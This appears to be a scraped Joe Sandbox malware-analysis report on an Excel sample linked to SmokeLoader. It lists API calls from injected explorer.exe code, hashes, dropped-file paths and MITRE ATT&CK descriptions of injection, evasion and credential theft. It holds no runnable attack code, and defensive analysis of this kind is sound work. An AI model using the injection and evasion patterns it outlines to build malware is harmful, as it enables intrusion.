API String ID: 2993730741-0
Opcode ID: 0ac87bd373f8ed99958b6e0c08685b4a8e358e315492f70acb1fa5f8003aaa97
Instruction ID: d562493719cb4c4e026359440947dc2e3579e3f41aaee4e7071eec4338b3e0d2
Opcode Fuzzy Hash: 0ac87bd373f8ed99958b6e0c08685b4a8e358e315492f70acb1fa5f8003aaa97
Instruction Fuzzy Hash: DD217C717042029F8314EF689855EBFB7DAAB85704B10052EF856D3743DB74DE0A8AA2

Function 000C1581 Relevance: 7.6, APIs: 5, Instructions: 66
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalFix.KERNEL32(00000000), ref: 000C15A9
lstrlenW.KERNEL32(00000000), ref: 000C15C6
lstrcatW.KERNEL32(00000000,00000000), ref: 000C15DC
lstrlenW.KERNEL32(00000000), ref: 000C1600
GlobalUnWire.KERNEL32(00000000), ref: 000C161C

Memory Dump Source

Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_c1000_explorer.jbxd

Similarity

API ID: Globallstrlen$Wirelstrcat
String ID:
API String ID: 2993198917-0
Opcode ID: 459dcb5bd60fc1d6d8a4ec2484561232731dcca1fcf2940ef220a5a8ac2fd769
Instruction ID: 2927bbd73aaff1188484e355a6f7d029e9883fd6ebc964aa294f47b92abf4417
Opcode Fuzzy Hash: 459dcb5bd60fc1d6d8a4ec2484561232731dcca1fcf2940ef220a5a8ac2fd769
Instruction Fuzzy Hash: 9901D673A005119B96A5A7B96CA8FFE72EEDFC7311718812DF907D3223DE388D024251

Function 000C1BBD Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON

Download Yara Rule

APIs

RtlMoveMemory.NTDLL(?,?,?), ref: 000C1BF4
LoadLibraryA.KERNEL32(?), ref: 000C1C1C
GetProcAddress.KERNEL32(00000000,-00000002,?,?,00000001,?,00000000), ref: 000C1C49
LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 000C1C9A

Memory Dump Source

Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_c1000_explorer.jbxd

Similarity

API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
String ID:
API String ID: 3827878703-0
Opcode ID: a1fa2897f6eeaaf6418c8c6bd49ed20ebe01f4e3a186c38d30c5220face9fd6a
Instruction ID: 0f94b4d00775962fd9be86123519ab69dd273243beb291c40cf147945b3728e7
Opcode Fuzzy Hash: a1fa2897f6eeaaf6418c8c6bd49ed20ebe01f4e3a186c38d30c5220face9fd6a
Instruction Fuzzy Hash: 2931A072644216AFCB68CF29C8C5FAAB7E8BF16314B14812CF846C7202D735E855CBA0

Function 000C182D Relevance: 6.0, APIs: 4, Instructions: 42sleepstringCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(000C582C), ref: 000C1839
lstrlenW.KERNEL32 ref: 000C1845
RtlLeaveCriticalSection.NTDLL(000C582C), ref: 000C18A9
Sleep.KERNEL32(00007530), ref: 000C18B4

Memory Dump Source

Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_c1000_explorer.jbxd

Similarity

API ID: CriticalSection$EnterLeaveSleeplstrlen
String ID:
API String ID: 2134730579-0
Opcode ID: b7ca6529636f7f8254d03c94504c304348deab3eeb00a526b83db2b0e62c9f6f
Instruction ID: 3834de6056902f887f9ecd6d137a752c8a98f7cf684a6e0de9bd4c27b350f12c
Opcode Fuzzy Hash: b7ca6529636f7f8254d03c94504c304348deab3eeb00a526b83db2b0e62c9f6f
Instruction Fuzzy Hash: F501DB75514900EBE314A765EC1AEBF3AA9EF42701720401CF401D72A3DE38DD05D7A2

Function 000C26C9 Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,000C11DD), ref: 000C26DB
IsWow64Process.KERNEL32(000000FF,?), ref: 000C26ED
IsWow64Process.KERNEL32(00000000,?), ref: 000C2700
CloseHandle.KERNEL32(00000000), ref: 000C2716

Memory Dump Source

Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_c1000_explorer.jbxd

Similarity

API ID: Process$Wow64$CloseHandleOpen
String ID:
API String ID: 331459951-0
Opcode ID: 02297c31019684d447ac4339689d1bc2c5ca3f6844345d9c4ad04b586d5aaf51
Instruction ID: 8543e8021ad4659119aa57ca7a68f514f5d5e7197e66a885c8417ef43d17e97b
Opcode Fuzzy Hash: 02297c31019684d447ac4339689d1bc2c5ca3f6844345d9c4ad04b586d5aaf51
Instruction Fuzzy Hash: EDF0B472816218FFAB10CFA0AD88DEEB7BCEF05351B20436EE90493540D7344F0096A1

Function 000C17DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31timeCOMMON

Download Yara Rule

APIs

Part of subcall function 000C2A09: GetProcessHeap.KERNEL32(00000008,0000A000,000C10BF), ref: 000C2A0C
Part of subcall function 000C2A09: RtlAllocateHeap.NTDLL(00000000), ref: 000C2A13

GetLocalTime.KERNEL32(?,00000000), ref: 000C17F3
wsprintfW.USER32 ref: 000C181D

Strings

[%02d.%02d.%d %02d:%02d:%02d], xrefs: 000C1817

Memory Dump Source

Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_c1000_explorer.jbxd

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID: [%02d.%02d.%d %02d:%02d:%02d]
API String ID: 377395780-613334611
Opcode ID: 379196f9af00695f8a59d988b2b225ed8e44fa6729e6e404bb9aa1f661145cb5
Instruction ID: fc756d089e7f805dcc5fcce9bd6ebdc4614374d7682bf0dbb65d2506be8e73c4
Opcode Fuzzy Hash: 379196f9af00695f8a59d988b2b225ed8e44fa6729e6e404bb9aa1f661145cb5
Instruction Fuzzy Hash: 16F03072910128BA9714ABDA9C05DFFB2FCEB0CB02B00018AFE41E1181E67D5A50D3B5

Analysis Process: explorer.exePID: 3352, Parent PID: 1244COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0006370C Relevance: 1.6, APIs: 1, Instructions: 75
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 0006378C

Memory Dump Source

Source File: 0000001D.00000002.605252285.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_61000_explorer.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
Instruction ID: 6f86dcd5657ea9ef3a129f1321056eeef28fe10e10ecd7700be2daa8a1f1615e
Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
Instruction Fuzzy Hash: 9611C8746069094FFB6CFBB8989D3B533D3FB14312F544029E815C72A2DE398A818740

Function 000634C4 Relevance: 10.7, APIs: 7, Instructions: 195
processstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00061BF8: OpenFileMappingA.KERNEL32 ref: 00061C0F
Part of subcall function 00061BF8: MapViewOfFile.KERNEL32 ref: 00061C2E

CreateToolhelp32Snapshot.KERNEL32 ref: 000635B7
Process32First.KERNEL32 ref: 000635DA
lstrcmpi.KERNEL32 ref: 0006360C
Process32Next.KERNEL32 ref: 000636CD
CloseHandle.KERNELBASE ref: 000636DE
SysFreeMap.PGOCR ref: 000636F7
SleepEx.KERNEL32 ref: 00063701

Memory Dump Source

Source File: 0000001D.00000002.605252285.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_61000_explorer.jbxd

Similarity

API ID: FileProcess32$CloseCreateFirstFreeHandleMappingNextOpenSleepSnapshotToolhelp32Viewlstrcmpi
String ID:
API String ID: 3402289966-0
Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
Instruction ID: e861ec5d46096bab29741ff2dd44a154c76200efb4f374e95dae1c26c01eb10d
Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
Instruction Fuzzy Hash: 68517730218A089FDB59FF68D8996EA73E3EB94310F444619F45BC72A2DF78DA0587C1

Function 0006B4A8 Relevance: 4.8, APIs: 3, Instructions: 252
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,7473604B), ref: 0006B5A7
VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0006B651
VirtualProtect.KERNELBASE ref: 0006B66F

Memory Dump Source

Source File: 0000001D.00000002.605252285.000000000006A000.00000040.80000000.00040000.00000000.sdmp, Offset: 0006A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_6a000_explorer.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
Instruction ID: de7da5a6e30cfdee21bae1f1aab1ff707d31be70e42097908793e0bf60735bc1
Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
Instruction Fuzzy Hash: C1514772758D1D4BCB24AA7C9C843F8B7D3FB55325B58062AD49BC3285EB58C9C68381

Function 00061BF8 Relevance: 3.0, APIs: 2, Instructions: 40
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenFileMappingA.KERNEL32 ref: 00061C0F
MapViewOfFile.KERNEL32 ref: 00061C2E

Memory Dump Source

Source File: 0000001D.00000002.605252285.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_61000_explorer.jbxd

Similarity

API ID: File$MappingOpenView
String ID:
API String ID: 3439327939-0
Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
Instruction ID: 3bcaf25acfd1f49024d9787d5b89c15f37bef9fb8d047487d34edab0d4ccc7e8
Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
Instruction Fuzzy Hash: 0FF01234314F4D4FEB45EF7C9C9C135B7E1EBA8202744857A985AC6165EF34C8458711

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report #20240627_Edlen_A.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Exploits

Spreading

System Summary

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Bo3r4[1].txt

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl[1].doc

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lionarekingofjungleimageshere[1].bmp

Windows Analysis Report
#20240627_Edlen_A.xls

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre